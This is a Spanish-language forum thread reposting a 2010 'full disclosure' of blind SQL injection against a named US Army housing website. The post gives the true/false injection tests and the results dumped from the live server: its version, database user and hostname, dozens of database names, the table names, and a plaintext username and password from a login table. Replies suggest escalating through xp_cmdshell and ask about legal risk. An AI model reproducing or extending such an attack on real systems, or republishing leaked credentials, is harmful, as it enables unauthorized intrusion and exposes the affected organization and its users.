Blind SQL injection en una Web de las fuerzas des-armadas de USA

Iniciado por kamsky, 14 Enero 2010, 12:38 PM

0 Miembros y 1 Visitante están viendo este tema.

kamsky

                                /\                                    (_) |
                               /  \   _ __ _ __ ___  _   _   _ __ ___  _| |
                              / /\ \ | '__| '_ ` _ \| | | | | '_ ` _ \| | |
                             / ____ \| |  | | | | | | |_| |_| | | | | | | |
                            /_/    \_\_|  |_| |_| |_|\__, (_)_| |_| |_|_|_|
                                                      __/ |
                                                     |___/                 

The United States Army is the branch of the United States Military responsible for land-based military operations. It is the largest and oldest established branch of the U.S. military and is one of seven uniformed services. The modern Army has its roots in the Continental Army which was formed on 14 June 1775, before the establishment of the United States, to meet the demands of the American Revolutionary War. Congress created the United States Army on 14 June 1784 after the end of the war to replace the disbanded Continental Army. The Army considers itself to be descended from the Continental Army and thus dates its inception from the origins of that force.
Vulnerable link: http://onestop.army.mil
This website is vulnerable to MSSQL Injection. With this vulnerability i can see / extract all things from databases.
Testing:
and 1=1– (True)

and 1=2– (False)

Ok, in this picture we can see all main informations about webserver.

Main information:
Citar[b]#Version[/b]: Microsoft SQL Server 2000 - 8.00.2282 (Intel X86) Dec 30 2008 02:22:41 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2
[b]#User[/b]: Dynatouch
[b]#Database[/b]: AHOS
[b]#Host Name[/b]: AHSGSVDAHQIT130

All databases:
Citar[0] AHOS
[1] master
[2] tempdb
[3] model
[4] msdb
[5] AHOS
[6] AHIT_WEB
[7] AHOS_HQD
[8] AHOS_WL
[9] HEAT
[10] REF_DB
[11] ReportDB
[12] USAREUR_TEST
[13] YARDI_CONV
[14] HOMES_IFS
[15] HOMES_CDB_USAREUR
[16] HOMES_WHSE
[17] HUACFSDIS102148
[18] PINEA4CASTLE
[19] HOMES_CDB
[20] GFOQ_Development
[21] ARTI02036THS003
[22] BISM5843235S301
[23] CDAR0413DPWS001
[24] CHAB000639BS002
[25] FRSA1050WHDS212
[26] GGDE0032284S005
[27] GRAF0244HOUS001
[28] HDCS3980WHDS204
[29] Spotlight
[30] LEDW0003SWFS002
[31] LEDW0252GSWS003
[32] NHQA4106WDAS101
[33] PANS2913GSTS001
[34] PION0011414S601
[35] SEMI0022DPWS002
[36] SULL0255WMAS001
[37] VCAM0107HOUS001
[38] WARN7114279S003
[39] WETZ8876222S210
[40] WIAF1023221S001
[41] LEDW0252GSWS001
[42] BUCHAHOMES01
[43] CASEA4KORHOU068
[44] GREE305APDPW001
[45] HNRYA4KOA4HG086
[46] HUMPA1KODPWH014
[47] RICH123A0PHO001
[48] SCHOU01A4DPWHMS
[49] TORIDPWA4177105
[50] WAIN224DB003153
[51] YONGA4KODPHD995
[52] ZAMADPWA0067011
[53] ANADA1HOMES
[54] APGRA0GAG-HOMES
[55] BENNA0I32214251
[56] BLISSVDPW1HS001
[57] BRAGA4PWAJ18145
[58] CARSDPWXAPS0002
[59] DAEN3104WKLS005
[60] DAMIAP06
[61] DIXXAPRDPW00001
[62] DRUMA001VA11202
[63] DUGWITA4HOMES
[64] EUSTDB13HOMES01
[65] FS-HOMES01
[66] FTBELVOIR_S001
[67] GAHSGHOMES
[68] GORDDBRCP001
[69] HAMIA1206DPW008
[70] HAWTA0HOMES
[71] HIALA0KOA4HG170
[72] HOODA0DPWSYS003
[73] IRWIIMA0HOMES3
[74] JACKDLEHOMES
[75] KNOXDBOSNT2
[76] KS-HSG-HOMES

We can access information_schema, so let's see the tables from principal database "AHOS"

Citar[0] comd_list
[1] dtproperties
[2] Faqs
[3] Faqs_Categories
[4] Forms
[5] forms_base
[6] gBase
[7] gBase_OLD
[8] gCountries
[9] gHousing_offices
[10] gHousing_offices-old
[11] gStates
[12] Housing_off_post
[13] Housing_phone_qr
[14] mgr_login
[15] mgr_login_OLD
[16] mgr_login_passwords
[17] mgr_login_save
[18] MgrCorner_Configuration
[19] MgrCorner_Configuration_ID
[20] must_know
[21] must_know_cat
[22] Must_know_OLD
[23] sysconstraints
[24] syssegments
[25] UPH
[26] UPH_OLD
[27] uph_photo_text
[28] uph_photo_tours
[29] uph_photos
[30] v_mapview
[31] V_RankView
[32] vHousingAreas
[33] vhqd_vrtours
[34] VIEW_housing
[35] VIEW_phototours
[36] VIEW_vrtours
[37] vMapFiles
[38] vMapOrder
[39] vPhotoFiles
[40] vPlan
[41] vPlanFiles
[42] vRank
[43] vRankDesc
[44] vRankRankDesc
[45] waitlist
[46] waitlist_items

Now, here are some interesting tables, like mgr_login_passwords.

Here i found user : password columns, with :
Citar#Username: Dynatouch
#Password: AHOS

wtf! :|
That it's all! Bye, TinKode...



dejo el enlace: http://tinkode.baywords.com/index.php/2010/01/army-mil-full-disclosure/
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!

Novlucker

Las contraseñas en texto plano! ;-)

Hay que mirar además los otros temas que tienen en ese blog, no solo la US Army ha quedado mal parada, hay temas para Kaspersky, Yahoo, ESET Nod, Apple, Nasa :o

Saludos
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein

Van Hohenheim

jojo cierto se ve muy interesante la pagina  ;-); y por lo que se ve en la web vulnerable usan sql server 2000, asi que considerando que son vulnerables a injecciones tal vez el xp_cmdshell este activado xD

Debci

Una pregunta, viendeo ese paper, si yo porbase una injecion usando ese ejemplo en la pagina, podria tener represalias legales?

Saludos

WHK

casi siempre las webs con mas reputación son las mas vulnerables a pesar que son los que mas gastan dinero. Talves en ves de gastar tanto dinero en crear la web deberían destinar una cantidad en auditar el sistema en busca de falencias.

Debci

Cita de: WHK en 14 Enero 2010, 21:01 PM
casi siempre las webs con mas reputación son las mas vulnerables a pesar que son los que mas gastan dinero. Talves en ves de gastar tanto dinero en crear la web deberían destinar una cantidad en auditar el sistema en busca de falencias.
Wow no tenia ni idea, es cierto que a veces gastan mas en que quede bonita y tal...
Será cuestion de investigarlo...

Saludos

HuSSe19

cuanto mas grande sea una web, mas posibilidad hay de que tenga bugs

RON06

Cita de: HuSSe19 en 12 Marzo 2010, 08:01 AM
cuanto mas grande sea una web, mas posibilidad hay de que tenga bugs

Exacto estoy contigo... es decir cuanto más código más probabilidad de error  ;D